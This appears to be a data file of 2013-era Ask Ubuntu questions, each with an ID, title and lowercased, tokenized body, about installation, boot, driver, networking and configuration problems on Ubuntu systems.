297419	why ca n't i install ubuntu from live usb ?	i have been using ubuntu and other distro 's for years , but i have never had such difficulty trying to install it for a friend . i am trying to install ubuntu 12.04 from live usb to an hp mini 210-1036vu netbook but i am getting faulty medium errors . i have tried another usb drive , alternate install , using usb creator and unetbootin from two different computers and different release image versions ( 12.04.01 , 12.04.02 etc ) & all to the same end ! on the hp mini the disk check boot mode gives one error . it 's clean on my own laptop and image checksums are matched . should i try booting from an external disk drive ? is there possibly some discreet limitation to booting from a usb drive on this computer ? hardware drivers ? i have n't found the same problem in forums yet . i 'll try to provide more data on request .
297421	are there php bindings for indicators and notifications ?	are there already some projects/extensions or wrappers to allow easy creation of ubuntu unity indicators with php before i try and 'reinvent the wheel ' . a basic python template that would interface with a php class would be ideal . e.g , to map context menus to php functions and to define the 'main loop ' ( like glut for c++ ) .
297423	getting more space on wubi	first and foremost , note that i 'm a complete noob to linux , so please bear with my confuzzled rambling . i 've recently installed ubuntu 12.04 lts via wubi ( 18gb installation on the c : drive ) on an amd 64-bit windows 7 system , and love it . however , i 've just discovered that i 'm running out of space on the disc ; according to system monitor , i 'm using 16.2 / 16.8 gib on ext3 /dev/loop3 ( the ubuntu installation ) , while i 've got more than 400 gbs left on fuseblk /dev/sda3 ( /host/ ) . i 'd like to know how to re-mount wubi from ext3 /dev/loop0 to /dev/sda3 and take advantage of the space there - i 'm searching , but i have absolutely no idea how to do so . results of df -h : filesystem size used avail use % mounted on /dev/loop0 17g 17g 551m 97 % / udev 1.8g 12k 1.8g 1 % /dev tmpfs 741m 868k 740m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 332k 1.9g 1 % /run/shm /dev/sda3 582g 166g 417g 29 % /host results of sudo losetup -a : /dev/loop0 : [ 0803 ] :4714 ( /host/ubuntu/disks/root.disk ) help would be appreciated !
297426	source code for the tray on top right corner . ubuntu 12.04	i am looking for source code for the top right corner tray icons . i want to know how they are being executed and wanted to make few modifications of my own if i can . i am on ubuntu 12.04 the image on the top is the one i want to know about . thank you in advance .
297429	what linux version of flash do i download ?	i do n't know what linux version of adobe flash to install for ubuntu 13.04 ; also : once i get it , how do i install it ?
297430	is wubi installation a full installation , or is it a live cd with persistent file or partition ?	is wubi installation a full installation , or is it a live cd with persistent file or partition ? i want to know when i run apt-get update & & apt-get upgrade , will the new downloaded files replace the old files , or will they take new space from the partition/file ? using a persistent file with live cd always result in taking up extra space whenever updating something from the original ubuntu installation .
297431	invalid efi file path on windows 8	i installed ubuntu 13.04 on my new notebook ( that came with windows 8 installed ) and now when i try to load windows 8 appear the error : impossible to find command 'drivemap ' . ( this is in portuguese , i 'm not sure if i translated it right invalid efi file path . ubuntu is working ok. someone knows what can i do to solve this and have both so running ? i have searched on the internet but could n't find anything i could understand . can someone help me ?
297432	is it possible to call lightdm without logout ?	so i 'm making a video tutorial about ubuntu , but my virtualbox wont load lightdm , and i would like to show it in the video . is there a way of calling it from my installation of ubuntu without logging out the session so i can keep recording ?
297437	installation of ubuntu and replace windows vista	i have downloaded ubuntu and saved it on my external hard drive . i would like to replace windows vista and run ubuntu on it 's own . i have tried to boot straight on to the external usb drive but it wo n't do this . i moved the .exe file of ubuntu on to the desktop and it said that the device did n't have enough space . it installed 4gb and would not run .
297442	can not boot after a terminated upgrade	i have moved my hdd with ubuntu 12.04 to a new pc , but the wired lan did n't worked , so i have booted the computer from a 13.04 usb stick to see if it is working there ( it works ) , and started the installer with the upgrade option , but stopped it at the step when it asks for my real name ( it is one of the first steps ) . now i have got an error saying something like invalid or corrupt kernel image ... when trying to boot from the hdd . i have checked the partitions with gparted , and they seems to be fine . is it possible to somehow fix the old installation ? update : sorry , this error message only occurs when trying the `` boot from first hard disk '' option from the unetbootin menu . the following error occurs when i remove the usb stick and try to boot from the hdd : mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.18.5 ( ubuntu 1:1.18.5/1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ update2 : tried boot-repair as bodhi.zazen suggested , and got the following error : missing operating system . reboot and select proper boot device or insert boot media in selected boot device and press a key here is the repair log : http : //paste.ubuntu.com/5680854/ update3 : i ca n't see the /dev , /proc and /sys folders on the old partition . i think that the updater already deleted them ... update4 : i have lost the /etc and /var directories as well ( with lot of data and a vboxed windows ) . tried many recovery application with no luck ... everything was messed up so i ended up with reinstalling and recovering from backups ...
297447	cloned mac not work with networkmanager in 64bit ubuntu , and i use usb wireless card rt3070	i set a different mac address in the networkmanager , but it keep the old mac address . however , change mac work with type ifconfig hw ether *** , but it 's not that i want : i found this in /var/log/syslog : may 19 07:14:22 j-qth6 networkmanager [ 1244 ] : < info > ( wlan1 ) : taking down device . may 19 07:14:22 j-qth6 networkmanager [ 1244 ] : < warn > ( wlan1 ) : failed to change interface mac address may 19 07:14:22 j-qth6 networkmanager [ 1244 ] : < warn > ( wlan1 ) : failed to set mac address to a8:35 : d7 : d2:4f:1a may 19 07:14:23 j-qth6 networkmanager [ 1244 ] : < info > activation ( wlan1 ) stage 2 of 5 ( device configure ) scheduled ... may 19 07:14:23 j-qth6 networkmanager [ 1244 ] : < info > activation ( wlan1 ) stage 1 of 5 ( device prepare ) complete . i also try to change another mac , still not work . then i tried to do the same thing in ubuntu13.04-amd64 , xubuntu13.04-amd64 and ubuntu12.04lts-amd64 . i found it only work in 12.04lts . so is there any solution ?
297450	does copying files from ntfs to ext4 degrade/corrupt the files ?	the reason i ask is i am very new to ubuntu , but i want to get into mobile development . i installed ubuntu alongside windows 8 but it just does n't run quite as well as i would expect so a friend mentioned that ubuntu would run smoother if you started with a completely blank disk , no windows . so i want to do this and ditch windows since i can see ubuntu easily allows me to complete my basic tasks ( goodbye skyrim : tears : ) . but i do want to keep all my music , videos and documents from windows .
297460	lubuntu wo n't install using wubi ( pastebin of log file included )	so i tried to install lubuntu 2 times now , and it seems that it wo n't install because at the very last of the install progress i get the error : could not retrieve the required installation files for more ingormation , please see the log file ( http : //pastebin.com/kjjbffe8 ) i tried a live usb and it just does n't boot up . anyone know what the problem could be ? i 'm on a 64 bit i7 gtx560 system kind regards , gilles
297464	open file or folder location directly when searching for it - nautilus	i currently use nautilus as my default file manager . when i search for some file or folder , i also need to switch to the directory that contains the particular file or folder . it feels tedious to go to the properties then copy the path and open the same path . how can i save time , could there be some shortcut to switch to the directory that contains the file ( or folder ) being looked upon .
297467	using mouse in grub2	can we use mouse in grub2 , so that i am able to select different operating systems on my computer with my mouse . thanks . any ideas or suggestions would be appreciated . any link to a variant of grub that does have this functionality would be helpful .
297469	unity 3d support	i have hp pavilion g7-1260us laptop . i recently installed ubuntu ( 12.04 ) , when i login on unity 3d , my screen starts flashing weirdly.if somebody can help me please .
297473	how to get a list of installed programmes with python ?	i 'd like to make a programme , which would allow a user to choose , which application to run . i understand , it is possible to just run a command , which user specifies , but it would be much nicer , if it was possible to also give the user a list of all programmes , of which he or she could choose . is it possible somehow ?
297477	ubuntu 13.04 upgrade : problems with nvidia graphic drivers	i have a made a clean upgrade from 11.04 to 13.04 in my acer desktop with graphic nvidia geforce 7100 / nforce 630i/integrated/sse2 . with 11.04 i had no problems . now if i use nouveau graphic drivers the system is very slow . the same with nvidia 173 drivers . instead with drivers 304 and 304 updates it does not boot . i have to go through grub : ubuntu recovery mode and then resume . in this way the system boots and works fine . i think the problem is in the graphic driver . but my question is : what is different when instead of a straight boot i go throuh recovery mode/resume ? if i can not have a good graphic driver can i make this difference , let say , permanent ? many thanks if someone can help .
297479	what is this red light in lower right hand corner ?	here is a screen shot . its not there after i restart but appears again :
297486	how do you restart unity ? i have no menu bars	yesterday after running my ubuntu hdd in vmware on win7 i found that i had somehow lost unity . even after actually booting into ubuntu , unity was gone . every answer on the web could n't bring it back . finally , i reformatted and reinstalled ubuntu . now , while trying to figure out how in god 's name to run a .run file , i ended up punching in a command that somehow disabled unity . i can not get it back . `` unity -- reset '' does n't work . ( error : the reset option is now deprecated ) i can log out and log in as a guest , and bam , unity is there . but if i log into my account it is just a desktop wallpaper and nothing more . i 'm about to give up on converting to linux , and i 'm a computer savvy person . i thought i could handle this , but this is just ridiculous . i 've spent hours researching ways to restart unity . i ca n't just reformat every time unity does n't restart . in summation : i can not restart unity . someone ... please ... i 'm begging you help me . i do n't want to go back to windows .
297490	i killed my network ! help please : d	as a newb , i have been playing with my setup . now , i get a waiting 60 seconds for network configuration waiting up to 60 more seconds for network configuration on boot and then when the ui is loaded the following errors appear : could not connect to wicd 's d-bus interface . check the wicd log for error messages the wicd daemon has shut down . the ui wpipll not function properly until it is restarted i have searched the hdd for wicd.log nothing there . i need to sort this out , so if anyone could help me to get my network back , i would love to give it a try . edit i run a sony vaio vgn-ar71e . wireless network card connecting directly to the internet via a wireless modem
297492	icon themes not detected by kde	i have been using kde for a while . i installed a lot of themes on gnome but most of the themes don get detected here in kde ? ? ? why is that so ? ? i like awoken theme but it does not show up on kde but i can see some themes like faenza accessible on kde . the most important theme that i wish now is awoken . how do i get that back ? ? ?
297497	how to install libreoffice in ubuntu 12.10 4.03.deb ?	i can not install libreoffice-4.03_deb in ubuntu 12.10 . uninstalled applications libreoffice native os ubuntu 12.10 . use the versions of portuguese-br .
297499	minitube for ubuntu 12.04 is outdated	the version of minitube offered via the ubuntu software center is very old . in fact , it does n't even work anymore . i know ubuntu 12.10+ offers a new version of the application , but i want to stick with the lts version for stability and support reasons . my question therefore is : who is the maintainer of the minitube-ubuntu package and how do i contact this person ? how can i vote for an up to date version of minitube for ubuntu 12.04 lts ? additional info : i know i could just add a ppa to my system , which will grant me access to the newest version of minitube , but i do n't trust this kind of procedure . webupd8 might be a well known and trusted source , but it 's not an option for me .
297509	how to use 'dired ' as default file manager ( instead of nautilus ) ?	i use emacs dired-mode as file manager and like it a lot . i am wondering if the following is possible : say you write an email from gmail in chrome ( i know that there are many email clients in emacs , but this is not of concern here ) . there 's a little button in chrome that lets you attach attachments . pushing it opens nautilus ( argh ) . i am wondering if this action could not open an emacs buffer in dired-mode so that i could navigate to the files , select them , and attach them to the email ? also , other tasks that normally open nautilus could open emacs in 'dired-mode ' . i would assume this is not so easy , but wanted to give it a shot ( and ask ) . the reason why i believe it is possible is that `` it 's all text '' already allows you to open a buffer in emacs , write some text and then send it to the text field from which `` it 's all text '' has been started .
297512	why ca n't i execute airdump-ng mon0 after installing aircrack-ng ?	i 'm new to ubuntu but i 'm trying to get hang of it for a while now , been trying to install aircrack-ng on the 12.04 lts but i 'm stuck now . this is a snapshot of where my problems got started . please help me with all options possible . if i should start everything all over , let me know with a vivid step-by-step procedure . i will be very grateful for the help .
297515	dell display problem ubuntu 13.04	since i upgrade from ubuntu 12.10 to 13.04 i ca n't change the brightness of the display , it remain in the darkest possible mode . i have a dell 3721 laptop . any advice ? @ dell : ~ $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) if i use this , i can change the brigntess , but its so uncomfortable , why i cant use the hotkeys or ubuntu system controll anymore ? echo 3500 | sudo tee /sys/class/backlight/intel_backlight/brightness
297516	`` nautilus-emblems '' in 13.04	it appears that 13.04 restored the emblem capability in `` nautilus-emblems '' . unfortunately the installation instructions in /usr/share/doc/nautilus-emblems/readme.md are n't very clear : as root user copy the .py file in /usr/share/nautilus-python/extensions/ . you need to kill nautilus : nautilus -q and restart it again : nautilus . copy to where ? has anyone got this working ?
297524	wubi installer stuck on 75 %	i 'm currently installing wubi , and the installer keeps getting stuck at about 75 % - i have had this problem before and i think i managed to fix it by resetting/stopping something in windows when booting into that , but i cant remember what it was . the last text in the installer ( if it helps ) is : ubuntu kernel : [ 483.749080 ] [ < c1064d60 > ] ? kthread_freezable_should_stop+0x60/0x60 ubuntu kernel : [ 483.749080 ] [ < c15d04fe > ] kernel_thread_helper+0x6/0x10 thank you for your help : - )
297525	trying to install ubuntu 13.04 i386 as a vm in virtualbox , the system crashes upon completion	i followed numerous tutorials to download ubuntu 13.04 , and it continues to crash at the end of the setup . i basically followed this tutorial . i am prompted to restart my computer at the end of the setup , and then it crashes . i also clicked force unmount at the bottom right-hand corner , and nothing happened . i have windows 8 , an intel i7 in my samsung series 5 laptop . also , i used a fixed size hd of 16gb instead of dynamic . also , i tried to encrypt . i also tried installing ubuntu 12.04 , and a bunch of other things . can someone tell me what to do at the end of the setup so this thing does n't crash ?
297530	bluetooth on aspire 4720z	how do i make ubuntu recognize the bluetooth adapter in my computer , i have ubuntu 12.10 .
297531	how to use windows 8 bootloader instead of ubuntu 13.04grub ?	i have dual booted my netbook with windows 8 pro and ubuntu 13.04. i do not like grub and think the windows 8 bootloader is a lot more clean and sharp . is there a way to use the windows bootloader instead of the horrible sticky looking grub ? please help !
297533	unsupported infrared ( ir ) remote in ubuntu	i have an infrared eye and remote , named ir 507 and rc105 , which only has windows-support ( drives avaliable on http : //edio-rc105-ir507.driver.soft32download.com/ ) . seems i only use ubuntu nowadays , i wonder if i can make this work at all with linux . i have downloaded the lirc tarbox but this not include drivers for mentioned remote . my experience of linux is that most things will work in any way , such as if i manually `` mapping '' the remote 's buttons with the infrared eye . my questions to the community are therefore , how do i connect a unsupported ir-receiver to the system ? how do i `` learn '' the receiver to understand different buttons from the remote ? is there any other preferable way to make it work ? i thought about wine , but will this make the remote implemented in system-commands ? this is the pdf manual . i use an latitude d630 32-bit with ubuntu 12.04 lts . thanks in advance .
297538	seeking rescue drive with zfs	i 'd like to create a usb flash drive with a live ubuntu that supports zfs . the purpose is to rescue , or do low-level things to , a computer with zfs . however i 've failed to find such a thing , and would rather not have to create one myself . help ? thanks .
297539	how can i install an older version of love games development ?	i want to play omg ! words ( check the last game in the article ) but i ca n't get it to run because it needs love 0.7 and the ppa i added has the latest stable version , love 0.8.0 . my version of ubuntu is precise pangolin ( 12.04 64-bit ) . when i checked the launchpad for love ( launchpad for love ) , 0.7.1 was only available for ubuntu 10.04 and i do not want to risk breaking my repositories by using it . the game starts out fine , until it tries to download the dictionary for it . i want to either install the version of love it needs or try another way to get the game to run . any help would be much appreciated . note : to anyone who looks at this question , here 's some screenshots of what happens when i try to use the version of love for precise .
297541	how to install linksys n600 ( ae2500 ) dual band wireless adapter on ubuntu 13.04 32-bit desktop ?	i just got a linksys n600 ( ae2500 ) dual band adapter to install on my ubuntu 13.04 deskyop . lsusb shows it uses bcm43236 and device id is 13b1:003a . i also saw brcmfmac43236b.bin in /lib/firmware/brcm . does anyone know how to make the usb wireless adapter work on 13.04 ? thanks , william
297547	how to use fuzzy gui editor in scilab ?	i 've installed fuzzy logic toolbox for scilab 5.4.1 in matlab we can write fuzzy in command line and use that . how to use fuzzy gui editor in scilab ?
297550	multi-window switcher - mouseover window title not showing	when i have multiple instances of the same program running i see white dots to the left of the launcher icon indicating how many instances i have running . when i click on the icon i see the window switcher kick in and all of the instances appear zoomed out . i used to be able to mouse over the instances and the window 's title would appear which helped to distinguish between the instances . however , at some stage over the last couple of weeks this has disappeared . is there a way i can re-activate the display of the window 's title on mouse over ?
297553	thinkpad t520 wo n't boot from usb	this is cross-post from ubuntuforums.org but as i 've received no responses there i 'm hoping for better luck here . basically , i 've installed the full version of ubuntu 12.04.2 lts on a 32 gb sandisk extreme usb flash drive using both the 32- and 64-bit live cds on my lenovo thinkpad t520 . the installation completes successfully with no issues , and i can see the usb drive in my boot menu under `` ubuntu '' , but when i select it and hit `` enter '' the boot menu simply reloads . it seems like , while the machine can clearly boot ubuntu , there 's something about using a usb flash drive that prevents it from working . i 've found references to an issue with thinkpads , but i 'm not sure if it 's relevant or how to implement the solution . additionally , i 've run boot-repair to no avail ( the results can be found here - sda is my internal hdd ( windows data drive ) , sdb is an msata ssd ( windows system drive ) , and sdc is the usb flash drive ) . any help would be greatly appreciated , thanks !
297557	how to convert wubi installation into live usb regular one ?	i am wanting to migrate from wubi to a regular install , but i want to be sure that i wo n't loose my current configurations and other settings . the plan i have is to use the 64g usb flash drive ( which i have made into a live usb ) to backup the configuration and other settings , verify the backup ( by checking the live flash drive settings ) and then do the migration .
297559	i 'd like to encrypt all my partitions and drives , but i 'm unsure grub will handle this nicely	i 'd like to use truecrypt to encrypt my ssd ( which has my / ubuntu installation on one partition and some other things on another ) , and both of my hdds ( one has /home for ubuntu and all of windows , the other has other random stuff ) , but i 'm worried that grub is n't going to behave nicely with encrypting entire partitions . can anyone tell me about their experiences with doing this sort of thing or provide a good answer to whether it 's safe or not .
297560	ntpd vs ntpdate : pros and cons	in order to keep the time accurate on a ubuntu system one can either : run the ntpd ( network time protocol daemon ) which will run all the time and continuously adjust the system time when clocks drift . or alternatively : call ntpdate periodically ( e.g . from cron ) questions : what are the pros and cons of each of these two methods ? which different scenarios call for picking one over the other ?
297562	easiest way to stop using a separate partition for /boot ?	i have an older machine that i originally set up as a dual boot with windows 7 and lubuntu . part of that setup was establishing a small partition for /boot . the partition is 89 mb , and with recent changes in the initrd it 's too small to support upgrading even though i only have the most recent kernel version in there ( the updater wants 41 mb of free space , but i have only 40 and it 's as stripped down as i can get it ) . what i 'd like to do is to just abandon the 89mb partition to the dustbin of bad ideas and move /boot into the root partition , where there is ample space . i do n't want to mess with the partition layout on the disk , and i do n't want to reinstall anything unless there is no other way . so my question is , what is the easiest , least likely to cause downtime way to switch away from using a separate partition for /boot ?
297564	go back from gnome 3.8 to gnome 3.6 in lubuntu 13.04	i had lubuntu 12.04 and wanted to try gnome shell . when i added the gnome3 ppa , that got me on 3.4 . i wanted to use 3.6 though and follow new releases from there , but from what i gathered about this topic essentially it looked like i had to upgrade the distro to do so . now i 'm on lubuntu 13.04 , and , with the gnome3 ppa enabled , i guess the next apt-get update automatically took me to 3.8 . now 3.8 at least is n't officially beta anymore , but still too unrounded and crashes way too often for my taste , so i 'd like to give it a few more months and stay with 3.6 in the meantime , is that possible ? thanks , ben
297567	i believe i was hacked	i have recently started using ubuntu and have enabled few basic access to the system such as ssh and sftp and also a script which emails me when anyone ssh to my system . today i got email trigger , that someone from a remote ip address logged in and it was not me . so i want to see how badly has my system got compromised and , mostly , what did they do ? if i ca n't pull that information now , what can i do to setup such logging for next time ? please feel free to suggest any solution as i am the root and the only user ...
297572	password changed for no reason ?	i 'm having a problem logging into my computer . i have ubuntu 12.04 and i am 100 % sure i did n't change my password , although i tried typing it 100 times , it 's not working . i restarted the computer , i made sure i did n't have caps on or that the layout did n't change , i even tried logging in with ssh , but the password seems to have been changed . i am the only one using my computer . i have a ssd drive and i 've heard others complaining to have the same issue with such drives . i chose to encrypt the home folder when i installed ubuntu , and i 'd like to get it back . i do understand that the whole point of an encrypted home is to be unable to decrypt it , but since i did n't change the password , maybe there 's a way ? maybe , for example , the logging password changed , but not the password that encrypts the home folder ? what can i do to be able to login again , or at least to get my stuff back ? edit : although i still do n't understand why i ca n't login , i tried using a live cd , and ecryptfs-unwrap-passphrase seems to work when i input the right password , which probably means that all is not lost . i really need help for step by step instructions to decrypt my home file , having the correct password . i do n't want to mess it up , there are important files and i do n't want to just go and try things i find on google .
297573	why is broadcom wireless so difficult with ubuntu ?	this is the second laptop i 've tried to convert to linux and the only thing that gives me trouble is the wireless .
297577	ubuntu server 13.04 - network balancing software help	i have ubuntu 13.04 server on my media server . installed for software i have deluge , deluge webui , webmin and blinddns ... what i would like to do is find kind of software that will take and basicly moniter the network trafic so that , say , dearing peak internet usage it limits how much bandwith is being used by an application like say deluge and dearing off peak times ( say the whole famly is sleeping ) it gives deluge unlimeted bandwith . so the question is dose anyone know of a good program that can do that or maybe even just one that you set by time of day ?
297588	getting a `` general error mounting filesystems '' after upgrade to 13.04	when i turn on his computer , the gnu grub menu appears . when i choose the ubuntu option , this shows up . what do i do ? scanning for btrfs filesystems general error mounting filesystems . a maintenance shell will now be started . control-d will terminate this shell and reboot the system . root @ sai-medical : ~ #
297589	can not rm or chown /var/log/snort as root	i am using ubuntu 11.10 gnome . i installed an older version of snort , uninstalled it and tried to install the latest version as root using sudo . however , the install crashed because root does not have permission to change or remove /var/log/snort . i thought root was supposed to have permission to do anything . i can not even change or rm the directory , or its contents when i su . ls -ld /var/log/snort returns drwxr-s -- - 2 snort adm 4096 2013-05-16 21:17 /var/log/snort can anyone suggest a resolution to this problem . thanks , peter .
297593	i have no sound on my headphones , but i have sound on my speakers using ubuntu 13.04	i have an hp pavilion dv6 laptop and my headphones are not working properly . when i plug them in , there is no sound coming through them . but if i unplug them , the sound comes normally through the speakers . i tried using alsamixer . and i noticed that when i plug the headphones in , one of the bars comes down . i brought it back up , but when i reboot it goes back to how it was . do any of you know a possible solution ? thanks
297596	vblank_mode=0 primusrun in application .desktop file	i just installed bumblebee and primusrun in my ubuntu 12.04 . i can execute applications like totem successfully through vblank_mode=0 primusrun totem in terminal . my doubt is how do i edit the .desktop files located at /usr/share/applications to choose nvidia as default ? i changed this line at totem.desktop file : exec=vblank_mode=0 primusrun totem % u but when the file is with this configuration i can not launch totem through unity launcher . am i doing something wrong here ?
297597	adf.ly tells me i need to enable cookies in firefox and chrome	i 'm using chrome and using firefox is not really an option . i want to download stuff for minecraft but adf.ly is not working . it tells me i need to enable cookies and i did but its still not working . can anyone help ?
297605	updating 12.04 for the first time	tried to use update manager for recently installed 12.04 . a little window pops up saying authentication is required and asks for a password . huh ? says there are 201 updates here ...
297607	ubuntu 12.4 will not update [ unmet dependencies ]	the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.15-0ubuntu10.3 ) but 2.15-0ubuntu10.4 is installed libc6-dev : depends : libc6 ( = 2.15-0ubuntu10.4 ) but 2.15-0ubuntu10.3 is installed depends : libc-dev-bin ( = 2.15-0ubuntu10.4 ) but 2.15-0ubuntu10.4 is installed libc6 : i386 : depends : libc-bin ( = 2.15-0ubuntu10.4 ) but 2.15-0ubuntu10.4 is installed any idea how to fix this ? i am new to ubuntu so lets take baby steps .
297612	i tried to transplant the wireless_tools to android4.0 system , but i have a problem with java	my linux system is ubuntu kylin , a new branch of ubuntu spreading mainly in china . i have changed some files , such as wireless.22.h , ifrename.c and iwlib.h , in wireless_tools.29/ which is located in android4.0 root directory . then i followed these steps : $ cd ~/android4.0 $ su $ [ key ] ( change to root ) root # source build/envsetup.sh root # cd ~/android4.0/wireless_tools.2.9/ root # mm then i got a message telling me that : your version is : java version `` 1.7.0_21 '' . the correct version is : java se 1.6 . then i did as how can i uninstall my current java and install sun java 1.6 the java was installed successfully , but when i tried mm again : your version is : java version `` 1.6.0_27 '' . the correct version is : java se 1.6 . then i tried https : //source.android.com/source/initializing.html , but it did n't work . how can i install `` java se 1.6 . '' correctly ?
297614	debug automatic laptop shutdown problem	i am using ubuntu 12.04 on my laptop and recently it started getting shutdown automatically while i am using it . i am sure there is no problem with any part getting over heating . some times it happens 5 mins after booting and some times after hours . i think i am having this problem after some kernel update . i am clueless how to debug this problem . can anyone tell me which logs i can check to find out the potential issue .
297621	ubuntu webapps create multiple icons when opened	i recently installed chromium on ubuntu 13.04 and started using webapps . the problem is for every webapp open there is an icon for the webapp and an icon for chromium in my launcher . for example if i have youtube , facebook and linkedin opened.then i have youtube , facebook and linkedin icons alongside with 3 chromium icons filling up my launcher.i do n't want those extra chromium icons . is there a way around this ?
297622	can not sign in online accounts with facebook	i tried to enter a new facebook account via gnome-control-center 's `` online accounts '' but it does n't work . when i click facebook , it shows a rotating icon then firefox opens and opens a page where facebook asks me my email address and password then nothing . nothing happends . it just redirected to this web address : https : //www.facebook.com/connect/blank.html # _=_ it and has these words : success security warning : please treat the url above as you would your password and do not share it with anyone . have also tried upgrading packages but still it does n't work . i am also using x86 version of ubuntu raring and also the problem does n't appear on the x86_64 version of ubuntu raring . update : after updating my x86_64 installation of ubuntu raring the problem appears .
297623	install of ubuntu touch onto a tablet	i have nearly completed the install but got this message ; david @ inspiron-8100 : ~ $ phablet-flash -d grouper -b device detected as grouper download set to http : //cdimage.ubuntu.com/ubuntu-touch-preview//daily-preinstalled/current starting new http connection ( 1 ) : cdimage.ubuntu.com starting new http connection ( 1 ) : cdimage.ubuntu.com download directory set to /home/david/downloads/phablet-flash/127 retrieving files not enough space in /data , found 854m david @ inspiron-8100 : ~ $ phablet-flash -d grouper -b device detected as grouper download set to http : //cdimage.ubuntu.com/ubuntu-touch-preview//daily-preinstalled/current starting new http connection ( 1 ) : cdimage.ubuntu.com starting new http connection ( 1 ) : cdimage.ubuntu.com download directory set to /home/david/downloads/phablet-flash/127 retrieving files not enough space in /data , found 854m david @ inspiron-8100 : ~ $ my tablet is an 8gig and i have a 4 gig sd card mounted . however , my internal storage shows only 850 megs available . the zip file for ubuntu is a little over 650 megs . yes i know its a compressed file . is there any way to get past this issue using my sd mounted card or the internal sd ?
297625	how to run testdisk.exe on a dd image of a 2tb hard drive	background info : i have ( 2 ) 2tb hard drives . hd1 - i hosed the mbr , drive wo n't mount , ca n't see data , but it must be there because i did n't do anything much to it except with testdisk hd2 - was empty , made a dd image backup of hd1 to this drive . although dd ran out of space it said ? took roughly 16 hrs to complete this task . the first drive was less than 1.5 tb 's in actual data though so hopefully it captured it all ? the data on the first drive ( and hopefully on the dd image on the second drive ) is my entire life 's work and is quite irreplaceable . i really need these files ( mostly raw photo images , tifs , jpg 's , home movies , my entire album collection in mp3 format , my entire dvd collection in mp4 format , etc ) question : how do i recover my data from the dd image on the second drive ? it 's just a humongous dd image file sitting there not a clue what to do with it .
297627	how to get button icons on ubuntu 13.04 ?	i have enabled the check mark for buttons-have-icons and menus-have-icons in gconf-editor as in this post . these icons were visible in ubuntu 12.04 , but not in 13.04 . what can i do to get back those ? thanks in advance .
297628	should i install amd64-microcode ?	this is my system : amd phenom ii x4 960t ( unlocked to 6 cores ) 8gb 1066 ddr2 ram gigabyte radeon hd6670 1gb ddr3 ( amd catalyst 13.4 propriety driver ) ubuntu 13.04 at 1920x1080 60hz dual boot with win7 64-bit logitech h390 usb headset i am playing left 4 dead 2 beta , portal beta , trine 2 , and other steam games . according to this google site , installing amd64-microcode could speed up my system . when i clicked to install using the software center , ubuntu wanted to remove linux-firmware , linux-generic , and linux-image-generic . does anyone know the benefits and/or risks to doing this ?
297629	how to verify if a reboot was due to power outage ?	we 've had problems with tripping a breaker and i think we just did it again , but i need to confirm that 1 of our boxes rebooted due to a power outage and not for another mundane reason . i have gleaned the following information from the logs , but wonder if there 's something more telling : approx time of restart : may 19 19:54:57 atlas07 $ last davidpar pts/0 10.1.2.12 sun may 19 19:54 still logged in reboot system boot 3.5.0-30-generic sun may 19 19:44 - 20:19 ( 00:34 ) davidpar pts/0 10.1.2.83 tue may 14 04:14 - 04:21 ( 00:06 ) ... $ tail -n 500 syslog < cut > may 19 19:44:58 atlas07 ntpdate [ 1489 ] : adjust time server 91.189.94.4 offset 0.000047 sec may 19 19:45:04 atlas07 cron [ 1492 ] : ( root ) cmd ( command -v debian-sa1 > /dev/null & & debian-sa1 1 1 ) may 19 19:54:57 atlas07 dbus [ 1012 ] : [ system ] activating service name='org.freedesktop.consolekit ' ( using servicehelper ) may 19 19:54:57 atlas07 dbus [ 1012 ] : [ system ] activating service name='org.freedesktop.policykit1 ' ( using servicehelper ) may 19 19:54:57 atlas07 polkitd [ 1565 ] : started daemon version 0.104 using authority implementation `local ' version `0.104' < cut >
297636	wired network works in live cd but not after installation	live cd and installation have working network connection . but after installing , the network connection is offline ; it wo n't connect ! no automatic configuration , aka dhcp does n't work . static configuration allows it to connect to the network ( so it says ) but i 'm unable to ping my dsl router , hence the nic is n't working properly . it will ping the loopback and it 's own static ip address and that 's it . the router also does n't see it connected to network ! i 've disabled ipv6 , but still no luck . i 've tried the command dhclient eth0 , but still no luck . i 've tried service network-manager restart , but still no luck . ifconfig shows static ip configuration and ipv6 disabled . my guess is the installed network driver is different from the live cd and installation version ; how retarded is that ! ok , seeing how i have no internet connection on this machine , how in the heck do i manually install a network driver for a dual boot intel mac mini ( 2009 model ) ? i 've been searching for an answer for 3 days now . i 've seen the same problem numerous times posted all over the internet , but i have yet to find a solution to the problem = ) . by the way , in osx , the network functions flawlessly so it 's not a hardware or network problem . also , seeing how this os has driver issues among other things , would it kill someone to create a gui device manager that installs with the os . it would be nice to be able to manage device drivers without going into the terminal ... just a thought .
297639	how to create system image of ubuntu , which can be used to deploy on new systems ?	i need to create system image which will have all the software & their configuration of the original system . ( original system = system from which the image is created ) i will be create multiple images of ubuntu desktops for my needs we will be using all versions of the ubuntu desktop 12.04 & later ( 62-bits as well as 32-bits ) i should be able to restore that image with all software and their configuration onto a new system . please suggest some software which is fit for this purpose . & let me know if any other info is required . please correct the tags if required .
297641	installing ubuntu help	i have a pc with 2 hdds , and want to install ubuntu 13.04 . unfortunately , my active partition is not on my windows xp partition . i assume my drive list when boot from liveusb similar like this : /dev/sda /dev/sda1 ( active partition ) /dev/sda2 ( empty drive ) /dev/sdb /dev/sdb1 ( windows xp system ) /dev/sdb2 ( data ) /dev/sdb3 ( data ) all of that is mbr disk . where i should install ubuntu and grub ?
